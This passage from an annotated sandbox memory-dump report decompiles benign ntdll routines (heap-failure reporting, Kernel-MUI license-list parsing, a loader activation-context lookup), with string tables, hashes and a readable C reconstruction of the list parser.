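if __name__ == "__main__":
    regs = summarise(parse_records(SAMPLE))
    for base, reg in sorted(regs.items()):
        sites = ", ".join(f"{ref:#x} {name}" for ref, name in sorted(reg["call_sites"].items()))
        print(f"{base:#010x} pe={reg['based_on_pe']} records={reg['records']} "
              f"distinct_opcodes={len(reg['opcode_ids'])} sites=[{sites}]")
```

Run stand-alone it prints one line per region; on the sample the 0x400000 image yields four records but only two call sites, and 0x10F0000 is reported as a region with no resolved calls, which matches the "Non-executed Functions" listing that follows, where that region carries only runtime diagnostic strings.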
                                                      Non-executed Functions

                                                      Strings
                                                      • *** enter .cxr %p for the context, xrefs: 011CB50D
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 011CB476
                                                      • read from, xrefs: 011CB4AD, 011CB4B2
                                                      • The resource is owned shared by %d threads, xrefs: 011CB37E
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 011CB47D
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 011CB484
                                                      • *** then kb to get the faulting stack, xrefs: 011CB51C
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 011CB305
                                                      • Go determine why that thread has not released the critical section., xrefs: 011CB3C5
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 011CB314
                                                      • The resource is owned exclusively by thread %p, xrefs: 011CB374
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011CB38F
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 011CB2DC
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 011CB48F
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 011CB352
                                                      • *** Inpage error in %ws:%s, xrefs: 011CB418
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 011CB3D6
                                                      • an invalid address, %p, xrefs: 011CB4CF
                                                      • *** enter .exr %p for the exception record, xrefs: 011CB4F1
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 011CB53F
                                                      • This failed because of error %Ix., xrefs: 011CB446
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 011CB39B
                                                      • a NULL pointer, xrefs: 011CB4E0
                                                      • <unknown>, xrefs: 011CB27E, 011CB2D1, 011CB350, 011CB399, 011CB417, 011CB48E
                                                      • write to, xrefs: 011CB4A6
                                                      • The instruction at %p referenced memory at %p., xrefs: 011CB432
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 011CB323
                                                      • The instruction at %p tried to %s , xrefs: 011CB4B6
                                                      • The critical section is owned by thread %p., xrefs: 011CB3B9
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 011CB2F3
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: 8c05e5124a6ad6b6d55833fec4d7e41cf86856dfd0c7bafd8eb96fe573680b34
                                                      • Instruction ID: 451dd94852f8c58bc25227e83950cae6a84caef713abb224352d57fb29dc89fe
                                                      • Opcode Fuzzy Hash: 8c05e5124a6ad6b6d55833fec4d7e41cf86856dfd0c7bafd8eb96fe573680b34
                                                      • Instruction Fuzzy Hash: FB811535A0C210BFDF2E6A8A9C46E7F7F26AF66AD5F81404CF504AB152E3B18411C776
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

C-Code - Quality: 44%
// Heap-failure report routine recovered from the image mapped at 0x10F0000.
// The decompiler left the helpers unnamed: E0111B150 is a printf-style debug
// output routine and *[fs:0x30] is the 32-bit PEB. PEB+0x0c is PEB->Ldr,
// Ldr+0x0c is the first LDR_DATA_TABLE_ENTRY on InLoadOrderModuleList (the
// process image) and entry+0x2c is its BaseDllName UNICODE_STRING, which is
// what the "HEAP[%wZ]: " prefix prints; before the loader data exists the
// plain "HEAP: " prefix is used instead. The globals at 0x1205898..0x12058c0
// hold the failure code, the heap handle, the failing address, three extra
// parameters, the last valid neighbouring blocks and a captured stack trace.
E011D1C06() {
	signed int _t27;
	char* _t104;
	char* _t105;
	intOrPtr _t113;
	intOrPtr _t115;
	intOrPtr _t117;
	intOrPtr _t119;
	intOrPtr _t120;

	_t105 = 0x10f48a4;            // default failure-name string (not resolved by the decompiler)
	_t104 = "HEAP: ";
	if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {      // PEB->Ldr not initialised yet
		_push(_t104);
		E0111B150();
	} else {
		E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
	}
	_push( *0x120589c);           // heap handle (second %p)
	E0111B150("Heap error detected at %p (heap handle %p)\n",  *0x12058a0);   // failing address (first %p)
	_t27 =  *0x1205898; // 0x0    // failure code, index into the heap_failure_* name table
	if(_t27 <= 0xf) {
		// 16-entry jump table: each case selects one of the heap_failure_* names in
		// the string table below. The decompiler recovered the assignment only for
		// case 0 and rendered cases 1..0xf as bare jumps to L21.
		switch( *((intOrPtr*)(_t27 * 4 +  &M011D1E96))) {
			case 0:
				_t105 = "heap_failure_internal";
				goto L21;
			case 1:
				goto L21;
			case 2:
				goto L21;
			case 3:
				goto L21;
			case 4:
				goto L21;
			case 5:
				goto L21;
			case 6:
				goto L21;
			case 7:
				goto L21;
			case 8:
				goto L21;
			case 9:
				goto L21;
			case 0xa:
				goto L21;
			case 0xb:
				goto L21;
			case 0xc:
				goto L21;
			case 0xd:
				goto L21;
			case 0xe:
				goto L21;
			case 0xf:
				goto L21;
		}
	}
	L21:
	// Every following line repeats the same prefix selection before its own message.
	if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
		_push(_t104);
		E0111B150();
	} else {
		E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
	}
	_push(_t105);                 // failure name (%s)
	E0111B150("Error code: %d - %s\n",  *0x1205898);
	_t113 =  *0x12058a4; // 0x0   // Parameter1..3 are printed only when non-zero
	if(_t113 != 0) {
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
			E0111B150();
		} else {
			E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
		}
		E0111B150("Parameter1: %p\n",  *0x12058a4);
	}
	_t115 =  *0x12058a8; // 0x0
	if(_t115 != 0) {
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
			E0111B150();
		} else {
			E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
		}
		E0111B150("Parameter2: %p\n",  *0x12058a8);
	}
	_t117 =  *0x12058ac; // 0x0
	if(_t117 != 0) {
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
			E0111B150();
		} else {
			E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
		}
		E0111B150("Parameter3: %p\n",  *0x12058ac);
	}
	_t119 =  *0x12058b0; // 0x0   // last valid block before the corrupted one
	if(_t119 != 0) {
		L41:
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
			E0111B150();
		} else {
			E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
		}
		_push( *0x12058b4);       // "after" block (second %p)
		E0111B150("Last known valid blocks: before - %p, after - %p\n",  *0x12058b0);
	} else {
		_t120 =  *0x12058b4; // 0x0   // last valid block after it; either one being set prints the line
		if(_t120 != 0) {
			goto L41;
		}
	}
	if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
		_push(_t104);
		E0111B150();
	} else {
		E0111B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
	}
	return E0111B150("Stack trace available at %p\n", 0x12058c0);   // address of the stored stack trace
}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: ae8a532eb8a173fd4c895f104cb9378cb335b241ac023642e4401121df4bd698
                                                      • Instruction ID: 813b883fdd4f3cd5b8cd598e073c5fa134f4c130f1db698bf14613be53bd2858
                                                      • Opcode Fuzzy Hash: ae8a532eb8a173fd4c895f104cb9378cb335b241ac023642e4401121df4bd698
                                                      • Instruction Fuzzy Hash: 6561E936916545EFD61FAB4AF589E24B3B4EB08930B0F843EF9096B341D7749C808F0A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
			/* Decompiled routine from the PE image mapped at 0x010F0000. The String ID above
			 * consists of ntdll's heap-failure diagnostics, and the routine itself only reads
			 * the WindowsExcludedProcs and Kernel-MUI-* license-policy values through
			 * E01121B8F and stores them in the caller's context (__ecx): this is loader/
			 * library code, not sample-specific logic. Helper roles inferred from their
			 * arguments: L01134620 and L011377F0 take the process heap (fs:[0x30] is the
			 * PEB, +0x18 is PEB->ProcessHeap) and behave like RtlAllocateHeap/RtlFreeHeap;
			 * E0115F3E0 copies a buffer; E01161370 locates the next single-wchar delimiter;
			 * E0115BB40 initialises a UNICODE_STRING in _v68, which L011243C0 validates.
			 * Return value (_t280) is an NTSTATUS. */
			E01123D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;
				/* Temporaries used below that the decompiler left undeclared. */
				signed int _t167;
				signed int* _t170;
				signed int* _t174;
				signed int _t191;
				signed int* _t201;
				signed int* _t202;
				signed int _t214;
				signed int* _t224;
				signed int* _t225;
                                                      
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				_t280 = 0;
                                                      				_t242 = __ecx;
                                                      				_v52 = __ecx;
                                                      				_v8 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v28 = 0;
                                                      				_v32 = 0;
                                                      				_v44 = 0;
                                                      				_v56 = 0;
                                                      				_t275 = 0;
                                                      				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d; /* STATUS_INVALID_PARAMETER: no context to fill */
					_t140 = 0;
					L50:
					/* Common exit: flag bit 0x800 marks the context as initialised, then the
					 * buffers and byte sizes of the Allowed/Disallowed/SKU lists, the
					 * WindowsExcludedProcs presence flag (_v56) and the Kernel-MUI-Number-Allowed
					 * value (_v60, -1 when absent) are stored at DWORD indexes 0x11..0x18. */
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;   /* Kernel-MUI-Language-Allowed buffer */
					_t242[0x16] = _v40;    /* ... and its size */
					_t242[0x18] = _v28;    /* Kernel-MUI-Language-Disallowed size */
					_t242[0x14] = _v32;    /* Kernel-MUI-Language-SKU buffer */
					_t242[0x17] = _t275;   /* Kernel-MUI-Language-Disallowed buffer */
					_t242[0x15] = _v44;    /* Kernel-MUI-Language-SKU size */
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
                                                      				}
				/* Each E01121B8F call queries one named license-policy value into _v8 (buffer)
				 * and _v12 (byte length); the buffer is released on the process heap once used. */
				if(E01121B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1; /* only the presence of the value is recorded */
					if(_v8 != 0) {
						L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01121B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8; /* first DWORD of the value; stays -1 when the value is absent */
					L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
                                                      				if(E01121B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                      					L16:
                                                      					if(E01121B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                      						L28:
                                                      						if(E01121B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                      							L46:
                                                      							_t275 = _v16;
                                                      							L47:
                                                      							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							/* An Allowed list takes precedence: when one was kept, the
							 * Disallowed buffer is released and reported as empty. */
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
                                                      							goto L50;
                                                      						}
						/* Kernel-MUI-Language-SKU list: copy the value into a zeroed process-heap
						 * buffer (length + 4 leaves room for a terminating wchar), split it in place
						 * on the delimiter E01161370 searches for, and validate every token. The
						 * same pattern is repeated below for the Disallowed and Allowed lists. */
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01134620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255); /* flags 8 = HEAP_ZERO_MEMORY */
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017; /* STATUS_NO_MEMORY */
							goto L46;
						} else {
							E0115F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01161370(_t276, 0x10f4e90);
							_pop(_t257);
                                                      							if(_t277 == 0) {
                                                      								L38:
                                                      								_t170 = _v48;
                                                      								if( *_v48 != 0) {
                                                      									E0115BB40(0,  &_v68, _t170);
                                                      									if(L011243C0( &_v68,  &_v24) != 0) {
										_t280 = _t280 + 1; /* accepted-token count; the decompiler rendered this increment as &(_t280[0]) */
                                                      									}
                                                      								}
                                                      								if(_t280 == 0) {
                                                      									_t280 = 0;
                                                      									L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                      									_v44 = 0;
                                                      									_v32 = 0;
                                                      								} else {
                                                      									_t280 = 0;
                                                      								}
                                                      								_t174 = _v8;
                                                      								if(_v8 != 0) {
                                                      									L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                      								}
                                                      								_v8 = _t280;
                                                      								goto L46;
                                                      							}
                                                      							_t243 = _v48;
                                                      							do {
                                                      								 *_t277 = 0;
                                                      								_t278 = _t277 + 2;
                                                      								E0115BB40(_t257,  &_v68, _t243);
                                                      								if(L011243C0( &_v68,  &_v24) != 0) {
									_t280 = _t280 + 1; /* accepted-token count (see above) */
                                                      								}
                                                      								_t243 = _t278;
                                                      								_t277 = E01161370(_t278, 0x10f4e90);
                                                      								_pop(_t257);
                                                      							} while (_t277 != 0);
                                                      							_v48 = _t243;
                                                      							_t242 = _v52;
                                                      							goto L38;
                                                      						}
                                                      					}
                                                      					_t191 = _v12;
                                                      					_t260 = _v12 + 4;
                                                      					_v28 = _t260;
                                                      					if(_t260 == 0) {
                                                      						_t275 = _t280;
                                                      						_v16 = _t280;
                                                      					} else {
                                                      						_t275 = L01134620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                      						_t191 = _v12;
                                                      						_v16 = _t275;
                                                      					}
                                                      					if(_t275 == 0) {
                                                      						_v28 = _t280;
                                                      						_t280 = 0xc0000017;
                                                      						goto L47;
                                                      					} else {
                                                      						E0115F3E0(_t275, _v8, _t191);
                                                      						_t285 = _t285 + 0xc;
                                                      						_v48 = _t275;
                                                      						_t279 = _t280;
                                                      						_t281 = E01161370(_v16, 0x10f4e90);
                                                      						_pop(_t262);
                                                      						if(_t281 != 0) {
                                                      							_t244 = _v48;
                                                      							do {
                                                      								 *_t281 = 0;
                                                      								_t282 = _t281 + 2;
                                                      								E0115BB40(_t262,  &_v68, _t244);
                                                      								if(L011243C0( &_v68,  &_v24) != 0) {
									_t279 = _t279 + 1; /* accepted-token count; rendered by the decompiler as &(_t279[0]) */
                                                      								}
                                                      								_t244 = _t282;
                                                      								_t281 = E01161370(_t282, 0x10f4e90);
                                                      								_pop(_t262);
                                                      							} while (_t281 != 0);
                                                      							_v48 = _t244;
                                                      							_t242 = _v52;
                                                      						}
                                                      						_t201 = _v48;
                                                      						_t280 = 0;
                                                      						if( *_v48 != 0) {
                                                      							E0115BB40(_t262,  &_v68, _t201);
                                                      							if(L011243C0( &_v68,  &_v24) != 0) {
								_t279 = _t279 + 1; /* accepted-token count (see above) */
                                                      							}
                                                      						}
                                                      						if(_t279 == 0) {
                                                      							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                      							_v28 = _t280;
                                                      							_v16 = _t280;
                                                      						}
                                                      						_t202 = _v8;
                                                      						if(_v8 != 0) {
                                                      							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                      						}
                                                      						_v8 = _t280;
                                                      						goto L28;
                                                      					}
                                                      				}
                                                      				_t214 = _v12;
                                                      				_t264 = _v12 + 4;
                                                      				_v40 = _t264;
                                                      				if(_t264 == 0) {
                                                      					_v20 = _t280;
                                                      				} else {
                                                      					_t236 = L01134620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                      					_t280 = _t236;
                                                      					_v20 = _t236;
                                                      					_t214 = _v12;
                                                      				}
                                                      				if(_t280 == 0) {
                                                      					_t161 = 0;
                                                      					_t280 = 0xc0000017;
                                                      					_v40 = 0;
                                                      					goto L48;
                                                      				} else {
                                                      					E0115F3E0(_t280, _v8, _t214);
                                                      					_t285 = _t285 + 0xc;
                                                      					_v48 = _t280;
                                                      					_t283 = E01161370(_t280, 0x10f4e90);
                                                      					_pop(_t267);
                                                      					if(_t283 != 0) {
                                                      						_t245 = _v48;
                                                      						do {
                                                      							 *_t283 = 0;
                                                      							_t284 = _t283 + 2;
                                                      							E0115BB40(_t267,  &_v68, _t245);
                                                      							if(L011243C0( &_v68,  &_v24) != 0) {
                                                      								_t275 = _t275 + 1;
                                                      							}
                                                      							_t245 = _t284;
                                                      							_t283 = E01161370(_t284, 0x10f4e90);
                                                      							_pop(_t267);
                                                      						} while (_t283 != 0);
                                                      						_v48 = _t245;
                                                      						_t242 = _v52;
                                                      					}
                                                      					_t224 = _v48;
                                                      					_t280 = 0;
                                                      					if( *_v48 != 0) {
                                                      						E0115BB40(_t267,  &_v68, _t224);
                                                      						if(L011243C0( &_v68,  &_v24) != 0) {
                                                      							_t275 = _t275 + 1;
                                                      						}
                                                      					}
                                                      					if(_t275 == 0) {
                                                      						L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                      						_v40 = _t280;
                                                      						_v20 = _t280;
                                                      					}
                                                      					_t225 = _v8;
                                                      					if(_v8 != 0) {
                                                      						L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                      					}
                                                      					_v8 = _t280;
                                                      					goto L16;
                                                      				}
                                                      			}
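The three list branches in the listing share one parse-and-count pattern that is hard to follow through the decompiler's register names. The following C program is an added example written for this page, not code from the sample or from the dumped module: it reconstructs that pattern in readable form. It assumes a semicolon as the delimiter (the real one lives at the unresolved constant 0x10f4e90), replaces the validator L011243C0 with a hypothetical `is_valid_language_tag()` that accepts "xx-YY"-shaped tags, and uses `calloc`/`free` where the listing uses the process heap; the sample input is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

typedef int NTSTATUS;
#define STATUS_SUCCESS           ((NTSTATUS)0x00000000)
#define STATUS_INVALID_PARAMETER ((NTSTATUS)0xC000000D)
#define STATUS_NO_MEMORY         ((NTSTATUS)0xC0000017)

/* Hypothetical stand-in for the validator L011243C0 in the listing (its real
 * acceptance rule is not visible in the dump): accept "xx-YY"-shaped tags only. */
static int is_valid_language_tag(const wchar_t *tok)
{
    size_t n = wcslen(tok);
    if (n < 5 || n > 11 || tok[2] != L'-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        wchar_t c = tok[i];
        int alpha = (c >= L'a' && c <= L'z') || (c >= L'A' && c <= L'Z');
        if (!alpha && c != L'-')
            return 0;
    }
    return 1;
}

/* Readable form of the per-list loop in the listing: copy the queried value into a
 * zeroed buffer of length + 4 (as the listing does, so the copy is always
 * NUL-terminated), split it in place by overwriting each delimiter with L'\0',
 * validate every token and count the accepted ones. The trailing token after the
 * last delimiter is checked separately, as the listing's "if (*_v48 != 0)" does.
 * When no token is accepted the buffer is released and *out stays NULL, matching
 * the listing's free-when-count-is-zero path. */
NTSTATUS parse_language_list(const wchar_t *value, size_t value_bytes, wchar_t delim,
                             wchar_t **out, size_t *out_bytes, unsigned *count)
{
    *out = NULL;
    *out_bytes = 0;
    *count = 0;
    if (value == NULL)
        return STATUS_INVALID_PARAMETER;

    size_t alloc = value_bytes + 4;            /* listing: _v12 + 4 */
    wchar_t *buf = calloc(1, alloc);           /* listing: heap alloc with HEAP_ZERO_MEMORY */
    if (buf == NULL)
        return STATUS_NO_MEMORY;
    memcpy(buf, value, value_bytes);

    wchar_t *cur = buf;
    wchar_t *sep;
    while ((sep = wcschr(cur, delim)) != NULL) {
        *sep = L'\0';                          /* terminate the current token in place */
        if (is_valid_language_tag(cur))
            (*count)++;
        cur = sep + 1;                         /* listing: _t277 + 2, one wchar past the delimiter */
    }
    if (*cur != L'\0' && is_valid_language_tag(cur))
        (*count)++;

    if (*count == 0) {
        free(buf);                             /* nothing usable: release and report empty */
        return STATUS_SUCCESS;
    }
    *out = buf;
    *out_bytes = alloc;
    return STATUS_SUCCESS;
}

int main(void)
{
    /* Constructed sample value, not data taken from the report. */
    const wchar_t *sample = L"en-US;de-DE;12;fr-FR;";
    wchar_t *buf;
    size_t nbytes;
    unsigned n;
    NTSTATUS st = parse_language_list(sample, (wcslen(sample) + 1) * sizeof(wchar_t),
                                      L';', &buf, &nbytes, &n);
    printf("status=0x%08X accepted=%u\n", (unsigned)st, n);
    free(buf);
    return 0;
}
```

The in-place split is why the listing keeps both the buffer and its byte size in the context: after the loop the buffer is a run of NUL-separated tokens, and a consumer walking it needs the size to know where the run ends.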
                                                      Instruction-address column (one address per line of the C code above, spilled out of the side-by-side layout): the function body lies at 0x01123d3c through 0x011240bd, with blocks relocated to 0x01178213 through 0x0117837c; goto lines carry no address (0x00000000).
                                                      0x01123dda
                                                      0x01123ddd
                                                      0x01123de0
                                                      0x01123de5
                                                      0x01178245
                                                      0x01123deb
                                                      0x01123df7
                                                      0x01123dfc
                                                      0x01123dfe
                                                      0x01123e01
                                                      0x01123e01
                                                      0x01123e06
                                                      0x0117824d
                                                      0x0117824f
                                                      0x01178254
                                                      0x00000000
                                                      0x01123e0c
                                                      0x01123e11
                                                      0x01123e16
                                                      0x01123e19
                                                      0x01123e29
                                                      0x01123e2c
                                                      0x01123e2f
                                                      0x0117825c
                                                      0x0117825f
                                                      0x01178261
                                                      0x01178264
                                                      0x0117826c
                                                      0x01178280
                                                      0x01178282
                                                      0x01178282
                                                      0x01178289
                                                      0x01178290
                                                      0x01178293
                                                      0x01178294
                                                      0x01178298
                                                      0x0117829b
                                                      0x0117829b
                                                      0x01123e35
                                                      0x01123e38
                                                      0x01123e3d
                                                      0x01123e44
                                                      0x01123e58
                                                      0x011782a3
                                                      0x011782a3
                                                      0x01123e58
                                                      0x01123e60
                                                      0x01123e6f
                                                      0x01123e74
                                                      0x01123e77
                                                      0x01123e77
                                                      0x01123e7a
                                                      0x01123e7f
                                                      0x01123e8c
                                                      0x01123e8c
                                                      0x01123e91
                                                      0x00000000
                                                      0x01123e91

                                                      Strings
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01123E97
                                                      • WindowsExcludedProcs, xrefs: 01123D6F
                                                      • Kernel-MUI-Language-Allowed, xrefs: 01123DC0
                                                      • Kernel-MUI-Number-Allowed, xrefs: 01123D8C
                                                      • Kernel-MUI-Language-SKU, xrefs: 01123F70
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: f4ed251418b86766e0ef2be79c45478b9ab3df03f75ae221397965a2c5e93d6d
                                                      • Instruction ID: 41c5c7b86ceb6394eeccc40b3dd34203b05a4eef0751ce3f2d15a00fd1ce6f59
                                                      • Opcode Fuzzy Hash: f4ed251418b86766e0ef2be79c45478b9ab3df03f75ae221397965a2c5e93d6d
                                                      • Instruction Fuzzy Hash: 43F19072D04629EFCB19DF98C984EEEBBB9FF48650F15005AE905E7650E7349E01CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E01148E00(void* __ecx) {
                                                      				signed int _v8;
                                                      				char _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr* _t32;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t43;
                                                      				void* _t46;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      				signed int _t49;
                                                      				void* _t50;
                                                      				intOrPtr* _t51;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				intOrPtr _t55;
                                                      
                                                      				_v8 =  *0x120d360 ^ _t52;
                                                      				_t49 = 0;
                                                      				_t48 = __ecx;
                                                      				_t55 =  *0x1208464; // 0x75150110
                                                      				if(_t55 == 0) {
                                                      					L9:
                                                      					if( !_t49 >= 0) {
                                                      						if(( *0x1205780 & 0x00000003) != 0) {
                                                      							E01195510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                      						}
                                                      						if(( *0x1205780 & 0x00000010) != 0) {
                                                      							asm("int3");
                                                      						}
                                                      					}
                                                      					return E0115B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                      				}
                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                      				_t43 =  *0x1207984; // 0xcb2e58
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                      					if(_t48 == _t43) {
                                                      						_t50 = 0x5c;
                                                      						if( *_t32 == _t50) {
                                                      							_t46 = 0x3f;
